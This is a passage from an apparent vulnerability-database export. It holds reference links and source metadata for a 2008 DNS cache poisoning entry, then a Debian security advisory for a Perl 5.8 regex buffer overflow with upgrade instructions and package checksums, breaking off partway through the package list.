            "trust": 1.8,
            "url": "http://www.vupen.com/english/advisories/2008/3129"
          },
          {
            "trust": 1.6,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-245206-1"
          },
          {
            "trust": 1.0,
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/46721"
          },
          {
            "trust": 0.8,
            "url": "http://csrc.nist.gov/publications/nistpubs/800-81/sp800-81.pdf"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/draft-ietf-dnsext-forgery-resilience"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3833"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc2827"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3704"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc3013"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/rfc4033"
          },
          {
            "trust": 0.8,
            "url": "http://tools.ietf.org/html/draft-ietf-tsvwg-port-randomization"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/dns_random.html"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/dns_transmit.html"
          },
          {
            "trust": 0.8,
            "url": "http://cr.yp.to/djbdns/forgery.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/microsoftdns"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/bind9dns"
          },
          {
            "trust": 0.8,
            "url": "http://www.trusteer.com/bind8dns"
          },
          {
            "trust": 0.8,
            "url": "http://www.sans.org/reading_room/whitepapers/dns/1567.php"
          },
          {
            "trust": 0.8,
            "url": "http://blogs.iss.net/archive/morednsnat.html"
          },
          {
            "trust": 0.8,
            "url": "https://jvn.jp/cert/jvnvu800113/"
          },
          {
            "trust": 0.8,
            "url": "http://www.cert.at/static/cert.at-0802-dns-patchanalysis.pdf"
          },
          {
            "trust": 0.8,
            "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2008-5133"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2008-5133"
          },
          {
            "trust": 0.6,
            "url": "http://www.frsirt.com/english/advisories/2008/3129"
          },
          {
            "trust": 0.4,
            "url": "http://www.phys.uu.nl/~rombouts/pdnsd/changelog"
          },
          {
            "trust": 0.4,
            "url": "http://www.kb.cert.org/vuls/id/800113"
          },
          {
            "trust": 0.3,
            "url": "http://blogs.sun.com/security/entry/isrs_available_for_bind_dns"
          },
          {
            "trust": 0.3,
            "url": "http://support.apple.com/kb/ht3137"
          },
          {
            "trust": 0.3,
            "url": "http://blog.ncircle.com/blogs/sync/archives/2008/08/apple_dns_patch_fails_to_rando.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.isc.org/index.pl?/sw/bind/view/?release=9.3.5-p2"
          },
          {
            "trust": 0.3,
            "url": "http://www.isc.org/index.pl?/sw/bind/view/?release=9.4.2-p2"
          },
          {
            "trust": 0.3,
            "url": "http://www.isc.org/index.pl?/sw/bind/view/?release=9.5.0-p2"
          },
          {
            "trust": 0.3,
            "url": "http://www.bluecatnetworks.com/clientsupport/"
          },
          {
            "trust": 0.3,
            "url": "http://www.checkpoint.com"
          },
          {
            "trust": 0.3,
            "url": "http://www.tinydns.org/"
          },
          {
            "trust": 0.3,
            "url": "http://blog.metasploit.com/2008/07/on-dns-attacks-in-wild-and-journalistic.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/web/about/security/intelligence/dns-bcp.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.securebits.org/dnsmre.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.f5.com/products/big-ip/"
          },
          {
            "trust": 0.3,
            "url": "http://www.f5.com/"
          },
          {
            "trust": 0.3,
            "url": "http://support.citrix.com/article/ctx116762"
          },
          {
            "trust": 0.3,
            "url": "http://www.sec-consult.com/files/whitepaper-dns-node-redelegation.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://www.us-cert.gov/current/index.html#internet_system_consortium_releases_bind"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/windows/default.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www.ruby-lang.org/en/news/2008/08/08/multiple-vulnerabilities-in-ruby/"
          },
          {
            "trust": 0.3,
            "url": "http://www.openbsd.org/errata42.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.openbsd.org/errata43.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.ingate.com/relnote-464.php"
          },
          {
            "trust": 0.3,
            "url": "http://darkoz.com/?p=15"
          },
          {
            "trust": 0.3,
            "url": "http://www.bluecatnetworks.com/"
          },
          {
            "trust": 0.3,
            "url": "http://f5.com/products/firepass/"
          },
          {
            "trust": 0.3,
            "url": "http://www.vmware.com"
          },
          {
            "trust": 0.3,
            "url": "http://www.windriver.com/"
          },
          {
            "trust": 0.3,
            "url": "http://www.rtpro.yamaha.co.jp/rt/faq/security/vu800113.html"
          },
          {
            "trust": 0.3,
            "url": "http://www.zonealarm.com/"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/500540"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/495304"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494716"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494055"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/495034"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494305"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494493"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494108"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/494818"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/495212"
          },
          {
            "trust": 0.3,
            "url": "http://support.avaya.com/elmodocs2/security/asa-2008-288.htm"
          },
          {
            "trust": 0.3,
            "url": "http://www.isc.org/index.pl?/sw/bind/bind-security.php"
          },
          {
            "trust": 0.3,
            "url": "http://www.cisco.com/warp/public/707/cisco-sa-20080708-dns.shtml"
          },
          {
            "trust": 0.3,
            "url": "http://support.citrix.com/article/ctx117991"
          },
          {
            "trust": 0.3,
            "url": "http://hypersonic.bluecoat.com/support/securityadvisories/dns_cache_poisoning"
          },
          {
            "trust": 0.3,
            "url": "http://www13.itrc.hp.com/service/cki/docdisplay.do?docid=emr_na-c01660723"
          },
          {
            "trust": 0.3,
            "url": "http://h20000.www2.hp.com/bizsupport/techsupport/document.jsp?objectid=c01662368"
          },
          {
            "trust": 0.3,
            "url": "https://h20564.www2.hp.com/hpsc/doc/public/display?docid=emr_na-c04530690 "
          },
          {
            "trust": 0.3,
            "url": "http://www-01.ibm.com/support/docview.wss?uid=isg1iz26670"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7dwr4j"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7ecl8q"
          },
          {
            "trust": 0.3,
            "url": "http://www.ipcop.org/index.php?name=news\u0026file=article\u0026sid=40"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/mimg-7dwr4z"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/technet/security/advisory/956187.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www.microsoft.com/technet/security/bulletin/ms08-037.mspx"
          },
          {
            "trust": 0.3,
            "url": "http://www1.alcatel-lucent.com/psirt/statements/2008003/dnscache.htm"
          },
          {
            "trust": 0.3,
            "url": "http://www.kb.cert.org/vuls/id/mapg-7g7nuc"
          },
          {
            "trust": 0.3,
            "url": "http://www.nominum.com/asset_upload_file741_2661.pdf"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026documentoid=762152\u0026poid="
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=751322"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0533.html"
          },
          {
            "trust": 0.3,
            "url": "http://rhn.redhat.com/errata/rhsa-2008-0789.html"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-26-239392-1"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-240048-1"
          },
          {
            "trust": 0.3,
            "url": "http://sunsolve.sun.com/search/document.do?assetkey=1-66-245206-1"
          },
          {
            "trust": 0.3,
            "url": "http://www.novell.com/support/viewcontent.do?externalid=7000912\u0026sliceid=1"
          },
          {
            "trust": 0.3,
            "url": "http://up2date.astaro.com/2008/08/up2date_7202_released.html"
          },
          {
            "trust": 0.3,
            "url": "http://up2date.astaro.com/2008/09/up2date_6314_released.html"
          },
          {
            "trust": 0.3,
            "url": "http://www14.software.ibm.com/webapp/set2/subscriptions/pqvcmjd?mode=18\u0026id=4527"
          },
          {
            "trust": 0.3,
            "url": "http://support.citrix.com/article/ctx118183"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/binary_analysis/sample_analysis/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/31847/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/product/9584/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/about_secunia_advisories/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          },
          {
            "db": "BID",
            "id": "30131"
          },
          {
            "db": "PACKETSTORM",
            "id": "70051"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971"
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133"
          }
        ]
      },
      "sources": {
        "_id": null,
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "db": "BID",
            "id": "30131",
            "ident": null
          },
          {
            "db": "PACKETSTORM",
            "id": "70051",
            "ident": null
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293",
            "ident": null
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2008-001971",
            "ident": null
          },
          {
            "db": "NVD",
            "id": "CVE-2008-5133",
            "ident": null
          }
        ]
      },
      "sources_release_date": {
        "_id": null,
        "data": [
          {
            "date": "2008-07-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "date": "2008-07-08T00:00:00",
            "db": "BID",
            "id": "30131",
            "ident": null
          },
          {
            "date": "2008-09-17T04:00:29",
            "db": "PACKETSTORM",
            "id": "70051",
            "ident": null
          },
          {
            "date": "2008-07-08T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200811-293",
            "ident": null
          },
          {
            "date": "2008-12-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2008-001971",
            "ident": null
          },
          {
            "date": "2008-11-18T16:00:00.327000",
            "db": "NVD",
            "id": "CVE-2008-5133",
            "ident": null
          }
        ]
      },
      "sources_update_date": {
        "_id": null,
        "data": [
          {
            "date": "2014-04-14T00:00:00",
            "db": "CERT/CC",
            "id": "VU#800113",
            "ident": null
          },
          {
            "date": "2015-04-13T21:35:00",
            "db": "BID",
            "id": "30131",
            "ident": null
          },
          {
            "date": "2008-11-18T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-200811-293",
            "ident": null
          },
          {
            "date": "2008-12-17T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2008-001971",
            "ident": null
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2008-5133",
            "ident": null
          }
        ]
      },
      "threat_type": {
        "_id": null,
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "_id": null,
        "data": "Multiple DNS implementations vulnerable to cache poisoning",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#800113"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "_id": null,
        "data": "permissions and access control",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-200811-293"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200711-0540

    Vulnerability from variot - Updated: 2026-03-09 21:22

    Buffer overflow in the polymorphic opcode support in the Regular Expression Engine (regcomp.c) in Perl 5.8 allows context-dependent attackers to execute arbitrary code by switching from byte to Unicode (UTF) characters in a regular expression. Perl is prone to a buffer-overflow vulnerability because it fails to sufficiently bounds-check user-supplied input. This facilitates the remote compromise of affected computers. Perl 5.8 is vulnerable to this issue; other versions may also be affected. Perl is a free and powerful programming language. An error in the way Perl's regular expression engine calculates the space required to process regular expressions could allow a local attacker to elevate privileges.

    For the stable distribution (etch), this problem has been fixed in version 5.8.8-7etch1.

    For the old stable distribution (sarge), this problem has been fixed in version 5.8.4-8sarge6.

    For the unstable distribution (sid), this problem will be fixed soon.

    Some architectures are missing from this DSA; these updates will be released once they are available.

    We recommend that you upgrade your perl package.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 3.1 alias sarge


    Source archives:

    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.dsc
      Size/MD5 checksum:     1031 653d1eaa085e027d325a520653e9785c
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6.diff.gz
      Size/MD5 checksum:   103931 b8c617d86f3baa2cd35bde936c0a76d5
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4.orig.tar.gz
      Size/MD5 checksum: 12094233 912050a9cb6b0f415b76ba56052fb4cf
    

    Architecture independent components:

    http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.4-8sarge6_all.deb
      Size/MD5 checksum:    38810 ff950bde09387a4023efff595fcb7b80
    http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.4-8sarge6_all.deb
      Size/MD5 checksum:  7049010 803d0a25ddd6d3a75769b39fd44c1b21
    http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.4-8sarge6_all.deb
      Size/MD5 checksum:  2178698 8f6bbe7db6414444fd5dbfb7786e6b76
    

    Alpha architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:   804866 47b0bbfc0d2544132ac23e7bbd6fd81f
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:     1008 dddcaa51b3b5b67c881b49a996e83944
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:  3902134 e2170d1b691a118df3a3277e6f4b0af9
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:   874688 bdb3fc1c1e0bed8bc37292f12ec9e803
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:  4132780 e2539f2b62fd1a394f5424a534e9a51d
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_alpha.deb
      Size/MD5 checksum:    37086 dd82f2321b96bc531e16857848bece42
    

    AMD64 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:   605148 b613969a68e576543f18f56b1956e78e
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:     1000 613477a3ba3f93013fa7a7776022d8e9
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:  3834172 7f354043d2e7bbee72c710982e4f9074
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:   791816 3541cf654fc59dd564c7af6642fae4df
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:  3935362 38fb00c40a25985bf22cfe9805543349
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_amd64.deb
      Size/MD5 checksum:    32846 2f8cd32f087f60c61457f73f75fe3781
    

    ARM architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:   613158 30cd5528198d49208274e50e60611b0a
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:     1026 fc64aa8b67f46fcccb6d85db7cb242ad
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:  3132808 226a69d4fa30d1e0a40f4d761826c230
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:   737524 b4aaf84bd60fef147d1131c5ffbc6a0a
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:  3719460 8e8d12058f9f7fb9e153d4c3ff79d0f4
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_arm.deb
      Size/MD5 checksum:    29880 faa9dc0401eb667e202e12f2d2cf9643
    

    HP Precision architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:   654704 4efe04a8f2a81c81860148da029a88a8
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:     1006 5081a0e11c583460919427c5b0c99a0d
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:  3922234 a2b4f6549b23dd3a6c11ff97b6377d3d
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:   867856 0955f80a504eb620dbab22129fe96dd3
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:  3910388 59e8e003f4d65c3e42785226c90d5466
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_hppa.deb
      Size/MD5 checksum:    34496 46aee518b3411566edf62ea822e0edfd
    

    Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:   567034 2edc13b9a19f6291bb300bcc28b815bd
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:   508698 9f275f4137b40e5cd465e3073527ad34
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:  3239308 bd4934402fadbd7c6c6c00260a4ecb88
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:   753218 4f70cd1586e664189be02a84247efe5d
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:  3736626 8710f57842322a711abf6161f57e9bc1
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_i386.deb
      Size/MD5 checksum:    31706 d4e08f75b79d3bb75b4bdea55d668b6f
    

    Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:   866526 1f01d28dbc0d3fac81fbf120d048896a
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:     1000 07c5c9823c9ff29b96ce76c63e4dfd16
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:  4027978 0919c0c823170c46578a52df90f69cfc
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:  1046706 7f724a26677aa52c39182a5109bd3bf9
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:  4534722 9a16fed74de4e2e0c43b1135c15df9d3
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_ia64.deb
      Size/MD5 checksum:    50106 e73b65a4b267ca99ba48ef64de4dfdc1
    

    Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:   457778 f25f1ebbbb4a5ce7b7a4a79c6256987e
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:     1040 9882ea5db94e569a35209a66c74bb390
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:  3815032 321dd2b80abad424b678f260d18f323a
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:   692196 733bfa10857d842bd907f408b03a8b3d
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:  3008672 81a0d0613ebe7b9affcd56174e1f955c
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_m68k.deb
      Size/MD5 checksum:    27934 68de12bace4cf3de7a339b25119b1611
    

    Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:   657066 7e2c9980c630b3aa1e60348a4998665a
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:     1032 3da5c1e82b6194beac8fe7020a38d7a3
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:  3384320 edfa53822abb7626b2bfd6ac4d5923df
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:   781078 f4a7b2e1bbd95c9381503b382d35ba58
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:  4017490 ddca3a084b7c9f1b841bd3f93e39a1d0
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge3_mips.deb
      Size/MD5 checksum:    32314 51f707f1c1d3df1c3ad05dc545512c10
    

    Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:   653134 bbb4600b3f9f2512fe9a9233bd06370e
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:     1008 42770abda5e92de95a180097e8588304
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:  3125468 db2214e0762dab59ebe7237fbe8d80b2
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:   781866 c3b6aa7d16d60fc0a083601801d57cdd
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:  3967958 2d941edd8a70f1461f4bc7ec9b97a396
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_mipsel.deb
      Size/MD5 checksum:    32426 c16e24f77488ab690b9c73d33e9fd7be
    

    PowerPC architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:   624852 fc0e31770a095b3180e8d29daac7ccc7
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:      988 5668a4e4abcab40b924c2855c4c34f62
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:  3509282 9e72e0a6a0d0108d701e9071e0ed4c3b
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:   790186 fa6005f52c5a101e053dc24e5247f025
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:  3700840 fe73cfba8f036b63839141d4a0564d49
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_powerpc.deb
      Size/MD5 checksum:    33564 e6d5ea2116ea4f5332c1ce887aa9b727
    

    IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:   604302 92d8311292f70764bafc0b015818d39d
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:      996 8870e77ca4719c8cc1c67f6ac15ee36c
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:  3819836 84eed51f2f162825d3bda29af8ddb203
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:   800590 ee302b41b1d011e089cb43db508415ef
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:  4235554 367b0ca68cd88842507c781cbb0e1f84
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_s390.deb
      Size/MD5 checksum:    33240 54ef9ae270587bb4c88f0e2b25d73347
    

    Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:   582166 027797bd12344393503ebae3344dfd43
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:     1006 4183b345e38cd2dcbca8c24cf3d02918
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:  3547444 716f93769b9aa9c442044f9fe96c77c7
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:   775850 6ef7c40ecdd6e08dbb37d0c02f8c89a2
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:  3840628 e665c9ff077083f5719b7574e24fae05
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.4-8sarge6_sparc.deb
      Size/MD5 checksum:    31038 64fcafc906130c016eb45f2394c5b4a8
    

    Debian GNU/Linux 4.0 alias etch


    Source archives:

    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.dsc
      Size/MD5 checksum:     1033 92799d6842afb4c5a9cbf483591b2c36
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1.diff.gz
      Size/MD5 checksum:    93005 caec226784d13b4108af359206f4dfe9
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8.orig.tar.gz
      Size/MD5 checksum: 12829188 b8c118d4360846829beb30b02a6b91a7
    

    Architecture independent components:

    http://security.debian.org/pool/updates/main/p/perl/libcgi-fast-perl_5.8.8-7etch1_all.deb
      Size/MD5 checksum:    40906 ac1a3065102a3bb7920a976833f1d3cc
    http://security.debian.org/pool/updates/main/p/perl/perl-doc_5.8.8-7etch1_all.deb
      Size/MD5 checksum:  7348690 c36b83c80b2c35515f3e6dec6451fda1
    http://security.debian.org/pool/updates/main/p/perl/perl-modules_5.8.8-7etch1_all.deb
      Size/MD5 checksum:  2313532 915e64aecc9e15678125def5267ea809
    

    Alpha architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:   821314 682e53e9c6736c48e31ea26e8697c870
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:     1016 252a644a15275db90c1a9273e6f3b854
    http://security.debian.org/pool/updates/main/p/perl/perl_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:  4135606 4925efac08f96859a7c8b47b886e0533
    http://security.debian.org/pool/updates/main/p/perl/perl-base_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:   877900 03dce75ac1f4c9765a24f6f25ba01251
    http://security.debian.org/pool/updates/main/p/perl/perl-debug_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:  2928420 1a9ab7809416b7cfc068180646414576
    http://security.debian.org/pool/updates/main/p/perl/perl-suid_5.8.8-7etch1_alpha.deb
      Size/MD5 checksum:    36248 927d991a17103561f701fb56d512279d
    

    AMD64 architecture:

    http://security.debian.org/pool/updates/main/p/perl/libperl-dev_5.8.8-7etch1_amd64.deb
      Size/MD5 checksum:   630480 cdfbd258b8ee105250f389c3adfdc16e
    http://security.debian.org/pool/updates/main/p/perl/libperl5.8_5.8.8-7etch1_amd64.deb
